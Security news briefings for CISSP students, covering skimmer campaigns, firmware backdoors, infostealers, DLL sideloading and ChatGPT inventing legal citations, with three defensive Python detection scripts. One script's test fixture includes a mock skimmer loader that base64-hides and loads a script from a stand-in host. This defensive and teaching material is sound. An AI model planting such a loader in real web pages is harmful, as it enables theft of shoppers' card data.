Blog entries about Les Bell and Associates Pty Ltd

Les Bell
by Les Bell - Tuesday, June 6, 2023, 7:15 AM

Welcome to today's daily briefing on security news relevant to our CISSP (and other) courses. Links within stories may lead to further details in the course notes of some of our courses, and will only be accessible if you are enrolled in the corresponding course - this is a shallow ploy to encourage ongoing study. However, each item ends with a link to the original source.

News Stories


Gigabyte UEFI BIOS Fix Release

Last Friday, we brought you news of a vulnerability in the UEFI BIOS of Gigabyte motherboards which could allow attackers to inject a UEFI bootloader via a MitM attack. The good news is that Gigabyte has now released an updated BIOS which has implemented stricter security checks during the boot process, specifically:

  • Signature verification - files downloaded from remote servers are now validated by checking their signatures, and
  • Privilege Access Limitations - stronger verification of remote server certificates

Security-conscious users might wish that Gigabyte had removed this automatic downloading feature completely - but then, not everyone is as conscientious about patching their systems, so an automatic process is perhaps necessary in some environments.

Uncredited, Gigabyte Fortifies System Security with Latest BIOS Updates and Enhanced Verification, press release, 1 June 2023. Available online at https://www.gigabyte.com/Press/News/2091.

KeePass Vulnerability Fixed

Another good news story: the keepers of the KeePass project - a password safe program favoured by a number of security pros in our circle - have released KeePass version 2.54, which fixes an in-memory master password exposure problem we reported on back in mid-May.

The new release also features some user interface and integration enhancements. There are some issues that existing users may need to pay attention to, involving triggers, global URL overrides and password generator profiles, which are now saved to the enforced configuration file - users who had not previously saved these to that file will find that they have been disabled until they reconfigure their individual settings.

Uncredited, KeePass 2.54 released, news release, 3 June 2023. Available online at https://keepass.info/news/n230603_2.54.html.

Merchant Servers Abused by Skimmer Campaign

Researchers at Akamai have discovered and analysed a new Magecart-style web skimmer campaign which steals PII and credit card information from a variety of e-commerce web sites running the popular Magento, WooCommerce WordPress and Shopify platforms across North America, Latin America and Europe. Some of the sites are estimated to handle hundreds of thousands of visitors per month, and these customers' information and credit card details could end up on the dark web.

The attack involves two sets of servers:

  • host victims - legitimate web sites which are hijacked in order to host the malicious JavaScript code which will be delivered to the victims; being legitimate businesses, these sites are less likely to arouse suspicion. Some of the host victims are themselves e-commerce sites which were compromised by the skimmer attack and then abused a second time to spread the attack malware.
  • web skimming victims - the vulnerable merchant servers which are targeted by the skimming attack. Rather than injecting the attack code directly into these sites, the attackers employ small JavaScript snippets to fetch their malware from the host victim sites, thereby concealing the malicious activity.

The injected snippets are intentionally designed to resemble popular third-party campaign tracking services such as Google Tag Manager and Facebook Pixel, and the URLs of the host victim web sites are further obfuscated by encoding them with base64.

The Akamai report suggests various mitigations, such as implementing a web application firewall.
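The loader snippets described above copy the shape of a tag-manager snippet but hide their real source behind a base64 literal, so a check that only greps a page for unexpected domains in the clear will miss them. The following scanner is an added example, not code from Akamai's report or from any of the platforms named: it pulls every inline script out of a page, decodes any long base64 literal it finds, and reports script hosts that are not on an allowlist of expected third-party services. The allowlist, the sample storefront page and the host cdn-host-victim.example are constructed for the example.

```python
"""Flag inline scripts that hide a loader URL behind base64 (added example)."""
import base64
import binascii
import re
from urllib.parse import urlparse

# Third-party hosts the merchant legitimately loads scripts from (assumed allowlist).
ALLOWED_SCRIPT_HOSTS = {
    "www.googletagmanager.com",
    "connect.facebook.net",
}

SCRIPT_RE = re.compile(r"<script\b[^>]*>(.*?)</script>", re.IGNORECASE | re.DOTALL)
# Candidate base64 literals: long runs of the base64 alphabet, optionally padded.
B64_RE = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")
URL_RE = re.compile(r"https?://[^\s'\"<>]+")


def decode_hidden_urls(script_body):
    """Return URLs that only appear after base64-decoding a literal in the script."""
    found = []
    for token in B64_RE.findall(script_body):
        try:
            decoded = base64.b64decode(token, validate=True).decode("ascii")
        except (binascii.Error, UnicodeDecodeError):
            continue  # not base64, or not text: identifiers and minified names land here
        found.extend(URL_RE.findall(decoded))
    return found


def scan_inline_scripts(html, allowed_hosts=ALLOWED_SCRIPT_HOSTS):
    """Return one finding per script URL whose host is not allowlisted.

    A URL written in the clear is reported as 'plain'; one recovered by decoding a
    base64 literal as 'encoded'. Genuine tag-manager snippets reference only
    allowlisted hosts, so they produce no findings.
    """
    findings = []
    for index, body in enumerate(SCRIPT_RE.findall(html)):
        candidates = [(u, "plain") for u in URL_RE.findall(body)]
        candidates += [(u, "encoded") for u in decode_hidden_urls(body)]
        for url, kind in candidates:
            host = urlparse(url).hostname
            if host and host not in allowed_hosts:
                findings.append({"script": index, "host": host, "kind": kind})
    return findings


def sample_page():
    """Constructed storefront page: two genuine tag snippets and one lookalike loader."""
    hidden = base64.b64encode(b"https://cdn-host-victim.example/gtm.js").decode("ascii")
    return f"""
<html><head>
<script>
(function(w,d,s,l,i){{w[l]=w[l]||[];var j=d.createElement(s);
j.src='https://www.googletagmanager.com/gtm.js?id='+i;d.head.appendChild(j);
}})(window,document,'script','dataLayer','GTM-XXXXXXX');
</script>
<script>
!function(f,b,e,v,n,t,s){{t=b.createElement(e);t.src=v;s=b.getElementsByTagName(e)[0];
s.parentNode.insertBefore(t,s)}}(window,document,'script','https://connect.facebook.net/en_US/fbevents.js');
fbq('init','000000000000000');fbq('track','PageView');
</script>
<!-- lookalike: same shape as the GTM snippet, but the src is base64-decoded at run time -->
<script>
(function(w,d,s,l,i){{var j=d.createElement(s);j.src=atob('{hidden}');d.head.appendChild(j);
}})(window,document,'script','dataLayer','GTM-XXXXXXX');
</script>
</head><body>checkout</body></html>
"""


if __name__ == "__main__":
    for finding in scan_inline_scripts(sample_page()):
        print(finding)
```

The decode step is what makes the lookalike visible: the third snippet contains no hostname in the clear, yet it is the only one reported. A Content Security Policy whose script-src lists the same allowlisted hosts is the browser-side counterpart of this check, and the two are complementary to the web application firewall the report recommends.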

Lvovsky, Roman, New Magecart-Style Campaign Abusing Legitimate Websites to Attack Others, blog post, 1 June 2023. Available online at https://www.akamai.com/blog/security-research/new-magecart-hides-behind-legit-domains.


These news brief blog articles are collected at https://www.lesbell.com.au/blog/index.php?courseid=1. If you would prefer an RSS feed for your reader, the feed can be found at https://www.lesbell.com.au/rss/file.php/1/dd977d83ae51998b0b79799c822ac0a1/blog/user/3/rss.xml.

Copyright to linked articles is held by their individual authors or publishers. Our commentary is licensed under a Creative Commons Attribution-ShareAlike 4.0 International License and is labeled TLP:CLEAR.

Les Bell
by Les Bell - Monday, June 5, 2023, 7:30 AM

Welcome to today's daily briefing on security news relevant to our CISSP (and other) courses. Links within stories may lead to further details in the course notes of some of our courses, and will only be accessible if you are enrolled in the corresponding course - this is a shallow ploy to encourage ongoing study. However, each item ends with a link to the original source.

News Stories


Qakbot Annual Evolution Continues

The operators of the Qakbot banking trojan - also known as Qbot and Pinkslipbot - have a pattern of taking the northern summer months off, presumably to rest and to refresh their tactics and the malware code. Researchers from Lumen's Black Lotus Labs have reported on the latest incarnation of Qakbot, which has evolved new initial infection and C2 techniques.

Daily active Qakbot bots, January - May 2023, with infection techniques (image credit: Lumen Black Lotus Labs)

During 2022, Qakbot had been relying on MS Office-based macro exploitation for initial infection, but after Microsoft disabled macros by default for Office users, they quickly switched between a variety of techniques: malicious OneNote files, HTML smuggling techniques, Mark of the Web evasion and malicious PDFs.

The Qakbot C2 infrastructure also evolved into a two-tier structure, with the first tier largely existing in residential dynamically-allocated consumer IP address space. These machines are frequently rebooted and their anti-malware tools frequently updated automatically, making it hard for the threat actor to persist in them, but Qakbot keeps its numbers up by retooling the machines it infects as C2s. Telemetry shows that a Qakbot victim machine is rapidly pillaged for data - after one week, it has sent 90% of all the data it will ever send to a C2, after which the operators use the victim for other purposes, including becoming a C2 or a proxy in their own infrastructure. The rapid turnover and changing IP addresses also enable Qakbot to elude tools which work on IP addresses as IOCs.

The second tier of C2 infrastructure is hosted on VPS machines, typically in data centers beyond the reach of all but Russian law enforcement.

Formosa, Chris, Steve Rudd and Ryan English, Qakbot: retool, reinfect, recycle, blog post, 1 June 2023. Available online at https://blog.lumen.com/qakbot-retool-reinfect-recycle/.

Google Triples Chrome Exploit Bug Bounty

Google has announced a higher maximum bug bounty in their Chrome Vulnerability Rewards Program. Until 1 December 2023, the first vulnerability report providing a functional full chain exploit resulting in a Chrome sandbox escape will be eligible for triple the full reward amount - that is, a reward of up to $US180,000 (and possibly more, with other bonuses).

Subsequent full chain reports submitted during this period will be eligible for double the full reward amount.

Bug reports may be submitted in advance while development of the functional exploit continues, but the functional exploit must be submitted by 1 December; only the first functional full chain exploit received is eligible for the triple reward amount. The exploit must result in Chrome browser sandbox escape, with a demonstration of attacker remote control or remote code execution outside the sandbox, with no or very little reliance on user interaction.

Ressler, Amy, Announcing the Chrome Browser Full Chain Exploit Bonus, blog post, 1 June 2023. Available online at https://security.googleblog.com/2023/06/announcing-chrome-browser-full-chain.html.


Les Bell
by Les Bell - Friday, June 2, 2023, 10:23 AM

Welcome to today's daily briefing on security news relevant to our CISSP (and other) courses. Links within stories may lead to further details in the course notes of some of our courses, and will only be accessible if you are enrolled in the corresponding course - this is a shallow ploy to encourage ongoing study. However, each item ends with a link to the original source.

News Stories


Back Door in Gigabyte Motherboards

Users of Gigabyte motherboards should urgently take note of a new vulnerability disclosed by Eclypsium researchers. The vulnerability, in the UEFI BIOS firmware of motherboards from manufacturer Gigabyte, actually writes a Windows executable, GigabyteUpdateService.exe, to disk as part of the system boot process and sets registry entries to run it as a Windows service.

This process gets run by the Windows Session Manager Subsystem (smss.exe) when Windows starts, and in turn, it downloads and runs an executable payload from one of several Gigabyte servers. Most worryingly, the latter process is highly insecure, allowing a download over plain, unprotected HTTP - with no TLS - and also not performing any signature verification on the downloaded executables.

These two steps are both highly concerning; the first is very similar to the techniques used by other UEFI boot hacks like LoJack DoubleAgent and firmware implants such as Sednit LoJax, while the second is vulnerable to MitM attacks and other exploits. And now that this vulnerability has been disclosed, we can expect 0days to follow in short order. Gigabyte should really know better: their motherboards have previously been exploited by a Chinese-originated bootkit.

Affected users should check their UEFI BIOS setup and disable the "App Center Download & Install" feature and set a BIOS password to prevent malicious changes. They should also update their systems to the latest firmware and software versions. Eclypsium's report also provides a list of URLs which can be blocked at the firewall, as well as a long - 3 pages! - list of affected motherboards.

Eclypsium, Supply Chain Risk from Gigabyte App Center Backdoor, blog post, 31 May 2023. Available online at https://eclypsium.com/blog/supply-chain-risk-from-gigabyte-app-center-backdoor/.

When Down-to-Earth Approaches to Security Aren't the Answer

Finally, a little light reading for your weekend - a cybersecurity issue that affects relatively few of us and perhaps as a result has escaped attention until now. In a recent paper presented at the spring 2023 IEEE Aerospace Conference, Johns Hopkins professor Gregory Falco drew attention to a blindingly obvious - with the benefit of hindsight - problem: the RFP for the development of the next-generation space suits to be used in the upcoming Artemis missions had no requirements for assurance of cybersecurity.

In fact, security is often overlooked in the development of space hardware, firmware and software. Back in the days of the Mercury, Gemini and Apollo missions, development benefited from security by obscurity, since the systems were so specialized. However, since then, we have seen the entry of private operators who inevitably seek cost-effectiveness through the use of commercial-off-the-shelf (COTS) hardware and software. Furthermore, we have transitioned through the development of the Internet to an era of ubiquitous, always-connected, computing and now to commercial space tourism which could see personally-owned devices connected to spacecraft networks and systems.

An article in IEEE Spectrum canvasses these issues and suggests some approaches to solutions.

Wells, Sarah, Cybersecurity Gaps Could Put Astronauts at Grave Risk: Houston, we may have a malware problem, IEEE Spectrum, 1 June 2023. Available online at https://spectrum.ieee.org/cybersecurity-in-space.


Les Bell
by Les Bell - Thursday, June 1, 2023, 9:51 AM

Welcome to today's daily briefing on security news relevant to our CISSP (and other) courses. Links within stories may lead to further details in the course notes of some of our courses, and will only be accessible if you are enrolled in the corresponding course - this is a shallow ploy to encourage ongoing study. However, each item ends with a link to the original source.

News Stories


CISA Vulnerability Summary for the Week of 22 May 2023

The US Cybersecurity & Infrastructure Security Agency has released a vulnerability summary listing vulns which were added to NIST's National Vulnerability Database (NVD) during the week commencing 22 May 2023. Just skimming the bulletin provides a sobering reminder of the struggle we face in securing our systems: the list of "High" severity vulns (those with a CVSS base score of 7.0 to 10.0) contains 115 entries in a huge array of software - everything from low-level drivers to applications for managing restaurant reservations and old age homes (including three applications I use myself!).

Uncredited, Vulnerability Summary for the Week of May 22, 2023, bulletin, 30 May 2023. Available online at https://www.cisa.gov/news-events/bulletins/sb23-150.

Latest Kali Linux Arrives

It's surprising to realise that everybody's favourite pen-testing platform, Kali Linux, has now been with us for ten years. Kali provides a broad range of pen-testing tools in a single package which can be downloaded either as an installer image for a dedicated hardware platform, or as a virtual machine image which, although it does not provide full access to the underlying hardware, makes an excellent platform for experimentation and education.

The 2023.2 release of Kali offers a number of updates:

  • New VM image for Microsoft Hyper-V - With “Enhanced Session Mode” (xRDP over HvSocket) out of the box
  • Xfce audio stack update: PulseAudio replaced by PipeWire - Better audio for Kali’s default desktop
  • i3 desktop overhaul - i3-gaps merged with i3 tiling window manager
  • Desktop updates - Easy file hash calculation in Xfce File Manager
  • GNOME 44 - Gnome Shell version bump
  • Icons & menus updates - New apps and icons in menu

These are all nice, but most users will be more interested in the new tools added to the network repositories for this release:

  • Cilium-cli - Install, manage & troubleshoot Kubernetes clusters
  • Cosign - Container Signing
  • Eksctl - Official CLI for Amazon EKS
  • Evilginx - Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies, allowing for the bypass of 2-factor authentication
  • GoPhish - Open-Source Phishing Toolkit
  • Humble - A fast security-oriented HTTP headers analyzer
  • Slim(toolkit) - Don’t change anything in your container image and minify it
  • Syft - Generating a Software Bill of Materials from container images and filesystems
  • Terraform - Safely and predictably create, change, and improve infrastructure
  • Tetragon - eBPF-based Security Observability and Runtime Enforcement
  • TheHive - A Scalable, Open Source and Free Security Incident Response Platform
  • Trivy - Find vulnerabilities, misconfigurations, secrets, SBOM in containers, Kubernetes, code repositories, clouds and more
  • Wsgidav - Generic and extendable WebDAV server based on WSGI

You can download Kali Linux release 2023.2 at https://www.kali.org/get-kali/.

Uncredited, Kali Linux 2023.2 Release (Hyper-V & PipeWire), blog post, 30 May 2023. Available online at https://www.kali.org/blog/kali-linux-2023-2-release/.

Amazon Fined Over $US30 Million For Privacy Breaches

Amazon has been fined a total of over $US30 million by the US Federal Trade Commission for two separate privacy violations.

In the first, Amazon settled for $US5.8 million over spying on female customers by a former employee, using Ring cameras placed in bedrooms and bathrooms. The company also agreed to pay $US25 million to settle allegations it violated the privacy rights of children when it failed to delete Alexa recordings at the request of parents, keeping them for longer than necessary. Amazon disagrees with the FTC's claims, but settled regardless.

The FTC is also probing Amazon's $US1.7 billion acquisition of iRobot Corp., which would give the online retail giant even more visibility into its customers' homes.

Bartz, Diane, Amazon's Ring used to spy on customers, FTC says in privacy settlement, Reuters, 31 May 2023. Available online at https://www.reuters.com/legal/us-ftc-sues-amazoncoms-ring-2023-05-31/.

Lawyers Beware: ChatGPT Hallucinates About Cases

A New York lawyer and his colleagues are learning the hard way about the dangers of trusting your work to artificial intelligence, having been ordered to show cause why they should not be sanctioned in the US District Court for the Southern District of New York for citing non-existent cases.

Steven Schwartz of the firm Levidow, Levidow, & Oberman had been acting for a plaintiff in a case filed against airline Avianca in a New York state court. When Avianca got the case moved to the federal court, Schwartz had a problem - he was not admitted to practice in that court - so his firm decided to have his colleague, Peter LoDuca, file the documents while Schwartz did the legwork behind the scenes.

Only, Schwartz didn't do the work himself, using ChatGPT to "supplement" his research. Unfortunately, the document he filed in opposition to a motion to dismiss was "replete with citations to non-existent cases", according to Federal Judge Kevin Castel, who apparently does do his own homework. "Six of the submitted cases appear to be bogus judicial decisions with bogus quotes and bogus internal citations."

Not only do the filings contain names of fictitious cases but also excerpts from the fictional decisions, citing precedents that do not exist. Schwartz counters, with a ChatGPT conversation transcript as evidence, that he asked the AI chatbot whether a case was real and was assured that it is, and "can be found on legal research databases such as Westlaw and LexisNexis", as could the other cases.

Schwartz and LoDuca will appear before the judge on 8 June to show cause why they and their firm should not be sanctioned. The obvious moral of the story is . . . obvious.

Brodkin, Jon, Lawyer cited 6 fake cases made up by ChatGPT; judge calls it “unprecedented”, Ars Technica, 31 May 2023. Available online at https://arstechnica.com/tech-policy/2023/05/lawyer-cited-6-fake-cases-made-up-by-chatgpt-judge-calls-it-unprecedented/.


Les Bell
by Les Bell - Wednesday, May 31, 2023, 6:47 AM

Welcome to today's daily briefing on security news relevant to our CISSP (and other) courses. Links within stories may lead to further details in the course notes of some of our courses, and will only be accessible if you are enrolled in the corresponding course - this is a shallow ploy to encourage ongoing study. However, each item ends with a link to the original source.

News Stories


From the "Who Ever Thought This Was a Good Idea?" File

Back in 2014, ICANN (the Internet Corporation for Assigned Names and Numbers) made a whole range of TLDs (top-level domains) available - mostly for the benefit of domain registrars who run a protection racket advising companies to register in them ("Nice .com domain name you've got here, squire. Be a shame if someone else registered a similar one, narrmean? [sniff]"). Sensibly, most companies have not fallen for the bait, but some registered generic TLDs in which they can sell subdomains. Among these was Google, which - after a long delay - is now offering registrations in such TLDs as .dad, .phd, .mov and .zip.

Now, I'm sure you can see the problem with this. Given the convergence of desktop shells and browsers, with URLs such as file:/// being treated in exactly the same way as https://, how do you know if you are looking at a link to a ZIP file, or to a server in the .zip domain? In fact, the Windows File Explorer search bar will open a .zip domain site if it cannot find the corresponding file on the user's machine. Expect the phishing threat actors to develop even more ingenious deceptions, too.

And sure enough, mr.d0x has provided a couple of interesting proof-of-concept examples. Using only straightforward HTML, CSS, JavaScript and some .png and .webp graphics, he has produced convincing emulations of both the WinRAR file archiving utility and the Windows 11 File Explorer window, along with two use cases: credential harvesting and downloading an executable in place of a document file.
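The ambiguity described above can be checked mechanically by a mail gateway or link-rewriting proxy before a person ever has to decide whether "invoice.zip" is a file or a host. The following check is an added example, not code from the mr.d0x write-up: it extracts both explicit URLs and bare dotted tokens from a message, resolves each the way a client autolinker would (bare tokens are assumed to become https:// links, which is this example's assumption), and flags hosts whose top-level label is one of the file-extension-like TLDs named in the story. The sample message and its domains are constructed.

```python
"""Flag links whose host ends in a file-extension-like TLD (added example)."""
import re
from urllib.parse import urlparse

# gTLDs named in the story that collide with common file extensions.
FILE_LIKE_TLDS = {"zip", "mov"}

# Either an explicit scheme://... URL, or a bare dotted token that an autolinker
# would turn into a web link (e.g. "invoice-2023.zip").
LINK_TOKEN_RE = re.compile(
    r"[a-z][a-z0-9+.-]*://[^\s<>\"']+"                       # explicit URL, any scheme
    r"|[A-Za-z0-9-]+(?:\.[A-Za-z0-9-]+)+(?:/[^\s<>\"']*)?",  # bare host-like token
    re.IGNORECASE,
)


def link_target(token):
    """Resolve a link token the way a client would.

    Returns ("local-file", path) for file: URLs and ("remote-host", host, risky)
    otherwise, where risky is True when the host's TLD is file-extension-like.
    Bare tokens are assumed to be autolinked as https:// (assumption).
    """
    if "://" not in token:
        token = "https://" + token
    parsed = urlparse(token)
    if parsed.scheme.lower() == "file":
        return ("local-file", parsed.path)
    host = (parsed.hostname or "").lower()
    tld = host.rsplit(".", 1)[-1]
    return ("remote-host", host, tld in FILE_LIKE_TLDS)


def find_file_like_hosts(text):
    """Return the hosts in text that a reader could mistake for a file name."""
    flagged = []
    for token in LINK_TOKEN_RE.findall(text):
        target = link_target(token)
        if target[0] == "remote-host" and target[2]:
            flagged.append(target[1])
    return flagged


# Constructed message body mixing a genuine download link, a local path and a bare token.
SAMPLE_TEXT = (
    "Your invoice is attached as invoice-2023.zip. "
    "Mirror: https://downloads.example.com/invoice-2023.zip "
    "Local copy: file:///C:/Users/me/invoice-2023.zip"
)

if __name__ == "__main__":
    print(find_file_like_hosts(SAMPLE_TEXT))  # ['invoice-2023.zip']
```

Only the bare token is flagged: the https:// link is a download of a .zip file from an ordinary host, and the file:/// link never leaves the machine. The bare token is the case the story is about, because a client that autolinks it turns what reads as an attachment name into a request to a server in the .zip domain.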

mr.d0x, File Archiver In The Browser, blog post, 22 May 2023. Available online at https://mrd0x.com/file-archiver-in-the-browser/.

Blackberry Threat Intelligence Report

Blackberry might not be a major player in the cellphone market these days, but its Cylance acquisition - now rebadged as Blackberry Cybersecurity - makes it a significant player in the enterprise endpoint detection and response market. The telemetry from this suite of products is used to compile Blackberry's quarterly Global Threat Intelligence Report. The latest edition, covering December 2022 to February 2023, was released recently, and - as with many such reports - makes for interesting reading.


Among the high points:

  • Although the US accounted for 65% of attacks detected, Brazil has risen to second place, with 10% of detected attacks. Australia is in sixth place, and Singapore entered the top ten for the first time.
  • The most-targeted industries were finance, followed by healthcare and FMCG (fast-moving consumer goods) retailers, collectively accounting for 60% of all malware-based attacks.
  • The most frequently-used techniques were droppers, downloaders, remote access trojans and ransomware.

Bestuzhev, Dmitry, et al., Global Threat Intelligence Report, technical report, April 2023. Available online at https://www.blackberry.com/us/en/solutions/threat-intelligence/2023/threat-intelligence-report-april.


Les Bell
by Les Bell - Tuesday, May 30, 2023, 9:52 AM

Welcome to today's daily briefing on security news relevant to our CISSP (and other) courses. Links within stories may lead to further details in the course notes of some of our courses, and will only be accessible if you are enrolled in the corresponding course - this is a shallow ploy to encourage ongoing study. However, each item ends with a link to the original source.

News Stories


Lazarus Group Targets IIS Via DLL Sideloading Attack

Researchers at South Korean security firm AhnLab have reported on a campaign being run by the North Korean state-sponsored APT known as the Lazarus Group. The specific attack targets servers running a vulnerable version of Microsoft's Internet Information Server, achieving initial access via a DLL sideloading technique.

In this attack, the threat actor uses the IIS web server process, w3wp.exe, to place a malicious DLL named msvcr100.dll into the same directory as a normal application executable, Wordconv.exe. When they run Wordconv.exe, it loads and executes the malicious DLL, exploiting the well-known DLL search path vulnerability in Windows: rather than only loading DLLs from the system library path, Windows will search the current working directory first and load the malicious DLL instead of the legitimate one.

msvcr100.dll is very similar to an earlier Lazarus Group DLL, cylvc.dll - it decrypts a data file called msvcr100.dat in order to create an executable file in memory, which it then runs, using yet another DLL called diagn.dll to decrypt and run another executable. This process resisted forensic analysis, but since it accesses the memory of the lsass.exe process, it is most likely a credential stealer. Once credentials have been acquired, the threat actor then performs network reconnaissance and pivots to other hosts using the RDP protocol.

The AhnLab report includes some analysis and IOCs.
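The hijack in this story depends on a DLL carrying a runtime library's name sitting in the application's own directory, accompanied here by an encrypted msvcr100.dat. The following hunt is an added example rather than code from the AhnLab report: it compares every DLL in an application directory with the same-named copy in the system directory by SHA-256, and also reports any DLL that has a same-stem .dat companion, the pairing the story describes. The directory layout it builds under a temporary folder (a System32 stand-in, a Wordconv folder, and all file contents) is constructed for the example; on a real host you would point find_sideloaded_dlls at the application directory and at C:\Windows\System32.

```python
"""Hunt for DLLs planted beside an application to hijack its DLL search order (added example)."""
import hashlib
import os
import tempfile


def sha256_of(path):
    """SHA-256 of a file, read in chunks so large DLLs are not loaded into memory whole."""
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(1 << 16), b""):
            digest.update(chunk)
    return digest.hexdigest()


def find_sideloaded_dlls(app_dir, system_dir):
    """Compare DLLs in an application directory against the system copies.

    Returns (dll_name, reason) pairs, in name order. A DLL that shares a name with a
    system DLL but has different content is the search-order hijack described in the
    story; a DLL with a same-stem .dat sibling matches the msvcr100.dll / .dat pairing.
    """
    system_dlls = {n.lower(): n for n in os.listdir(system_dir)}
    app_entries = {n.lower(): n for n in os.listdir(app_dir)}
    findings = []
    for lower, name in sorted(app_entries.items()):
        if not lower.endswith(".dll"):
            continue
        if lower in system_dlls:
            app_hash = sha256_of(os.path.join(app_dir, name))
            sys_hash = sha256_of(os.path.join(system_dir, system_dlls[lower]))
            if app_hash != sys_hash:
                findings.append((name, "content differs from system copy"))
        if lower[:-4] + ".dat" in app_entries:
            findings.append((name, "has a same-stem .dat companion file"))
    return findings


def build_fixture():
    """Constructed directory layout mimicking the story; returns (app_dir, system_dir)."""
    root = tempfile.mkdtemp(prefix="dll-hunt-")
    system_dir = os.path.join(root, "System32")
    app_dir = os.path.join(root, "Wordconv")
    os.makedirs(system_dir)
    os.makedirs(app_dir)
    files = {
        (system_dir, "msvcr100.dll"): b"constructed: genuine C runtime DLL bytes",
        (system_dir, "msvcp100.dll"): b"constructed: genuine C++ runtime DLL bytes",
        (app_dir, "Wordconv.exe"): b"constructed: application executable",
        (app_dir, "msvcp100.dll"): b"constructed: genuine C++ runtime DLL bytes",  # identical copy: benign
        (app_dir, "msvcr100.dll"): b"constructed: planted loader bytes",             # differs: suspicious
        (app_dir, "msvcr100.dat"): b"constructed: encrypted payload blob",
    }
    for (directory, name), content in files.items():
        with open(os.path.join(directory, name), "wb") as fh:
            fh.write(content)
    return app_dir, system_dir


if __name__ == "__main__":
    app, system = build_fixture()
    for dll, reason in find_sideloaded_dlls(app, system):
        print(f"{dll}: {reason}")
```

A mismatched hash is a lead, not a verdict: vendors do legitimately ship private copies of runtime DLLs beside their executables, so the odd copy's Authenticode signature, and whether a web server worker such as w3wp.exe should have been writing into that directory at all, decide the call. The .dat companion check is specific to this campaign's tooling and would be tuned to whatever IOCs the report lists.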

muhan, Lazarus Group Targeting Windows IIS Web Servers, technical report, 23 May 2023. Available online at https://asec.ahnlab.com/en/53132/.

Breached? At Least Think About Changing Passwords

An alarming statistic gleaned from a survey of cybersecurity breaches released by the UK Department for Science, Innovation & Technology last month reveals that only 6% of businesses and 4% of charities updated passwords after their most disruptive breach or attack of the previous 12 months. This is an astonishingly low figure, even allowing for the fact it was based on the 32% of business and 24% of charity survey respondents that had identified a breach, rather than the full sample of respondents. It also leads one to wonder: the survey question asked about only "the most disruptive breach or attack" - how many of the respondents had suffered multiple breaches? Probably more than a few, if their lax password practices are any indication.


Percentage of organisations that say they take, or would take, the following actions following a cyber security incident (UK Government)

Some of the other statistics are quite alarming - for example, only 57% of businesses and 60% of charities would inform a regulator, and only slightly more would formally debrief to log any lessons learned.

Around one-third of businesses and a quarter of charities reported having experienced some kind of cybersecurity breach or attack in the previous 12 months, with larger businesses and high-income charities being more likely to identify breaches or attacks than small ones.

The report makes fascinating, albeit somewhat scary, reading.

Johns, Emma, et al., Cyber security breaches survey 2023, UK Department for Science, Innovation & Technology, 19 April 2023. Available online at https://www.gov.uk/government/statistics/cyber-security-breaches-survey-2023/cyber-security-breaches-survey-2023.

Stealthy Infostealer Targets Browsers, Crypto Wallets

From Trend Micro comes a report of a new infostealer called Bandit Stealer which is being promoted within the malware community. Bandit Stealer is written in the Go programming language, perhaps with cross-platform compatibility in mind, and makes use of sandbox detection techniques in order to evade detection and analysis by anti-malware products.

The malware attempts to achieve privilege elevation by using the runas.exe utility (a rough equivalent of the *ix sudo command). However, it fails - primarily because running as Administrator would require it to provide a password.

It also checks to see if it is running in a container, sandbox, jail or any of several virtualization environments such as KVM, VirtualBox, VMware or Xen. However, while doing this, it also attempts to read /proc/self/status - a procfs path that only exists on Linux machines, indicating the intention of developing a cross-platform variant. It further downloads a text file containing hardware IDs, IP addresses, MAC addresses, usernames, hostnames and process names that might also indicate that it is being run in a sandbox or test environment, and if it sees any of the blacklisted processes, it will attempt to terminate them. Again, the use of Linux-specific commands like pgrep and pkill indicates cross-platform intent.

Bandit Stealer goes on to create an autorun registry entry in order to persist through reboots, and then sets about collecting information, storing it in a vicinfo folder in the user's AppData\Local\ directory. It collects user and host information, Telegram sessions, login data, cookies, web history and credit card details from any of many different browsers, as well pilfering cryptocurrency wallets.

Initial infection seems to be through drive-by downloads or phishing malmails which carry a dropper.

The Trend Micro report provides a more detailed analysis and IOCs.

Camling, Sarah Pearl and Paul John Bardon, New Info Stealer Bandit Stealer Targets Browsers, Wallets, research report, 26 May 2023. Available online at https://www.trendmicro.com/en_us/research/23/e/new-info-stealer-bandit-stealer-targets-browsers-wallets.html.


Les Bell
by Les Bell - Monday, May 29, 2023, 10:36 AM

Welcome to today's daily briefing on security news relevant to our CISSP (and other) courses. Links within stories may lead to further details in the course notes of some of our courses, and will only be accessible if you are enrolled in the corresponding course - this is a shallow ploy to encourage ongoing study. However, each item ends with a link to the original source.

News Stories


Crisis Communications Vital When Handling Privacy Breaches

Two stories over the weekend demonstrate the importance of having a good crisis communications plan in place before a privacy breach occurs. In fact, the two cases - which involve government agencies - could almost be case studies in how not to respond to a privacy breach.

In the first case, NT Health, the health department of the Northern Territory (Australia), apparently mismanaged the transfer of patient health records as part of a software upgrade. Over 50,000 patients had their records transferred between two government departments in 2018 and 2019, but more than 3,000 identifiable records - some classed as very-high or high clinical risk, such as psychological reports, psychiatric facility visits, pregnancy terminations and stillbirth records and ECT records - were subsequently transferred to global software vendor Intersystems.

Then-health minister - now Territory Chief Minister - Natasha Fyles never made the privacy breach public. Instead, the breach was managed "in-house" and patients were never notified. There appears to be some disagreement between the Information Commissioner, Peter Shoyer, who claims his department provided only "brief advice ... on potential further steps" and NT Health Chief Executive Marco Briceno, who said his department "consulted extensively at the time with the information commissioner".

In the second case, Fire Rescue Victoria (FRV) was attacked in December of last year and its emergency dispatch system taken offline (and remains offline at time of writing, in late May!). However, in early March, applicants for firefighter positions received a letter disclosing that "FRV has reasonable grounds to believe that the personal information of firefighter recruit applicants may have been accessed or stolen by a malicious third party". The letter stated that the data had been shared on the dark web but offered no further details.

In fact, not only was identification and contact information compromised as part of a ransomware attack, but also medical records, passport and driver's licence details, Medicare numbers, Centrelink numbers, healthcare identifiers and potentially health information and superannuation details.

By not providing the affected people with full details of the personal information that had been compromised, FRV denied them the opportunity to take steps to protect themselves against further loss, such as obtaining new driver's licences and other identifiers. It is not clear how many individuals are affected, but they certainly number in the thousands - potentially every applicant for firefighter recruitment, and there are more than 5,000 applications each year.

Whether the agencies' handling of these incidents complies with the requirements of the Privacy Act 1988 (Cth) and, specifically, the Notifiable Data Breaches scheme is a matter for the Information Commissioner, but both involve personal health information and would seem to fall within the definition of a serious data breach. In any case, a reasonable person would expect to be notified when their personal information - especially health records - is compromised, so there is an argument that notification is simply a matter of applying due care.

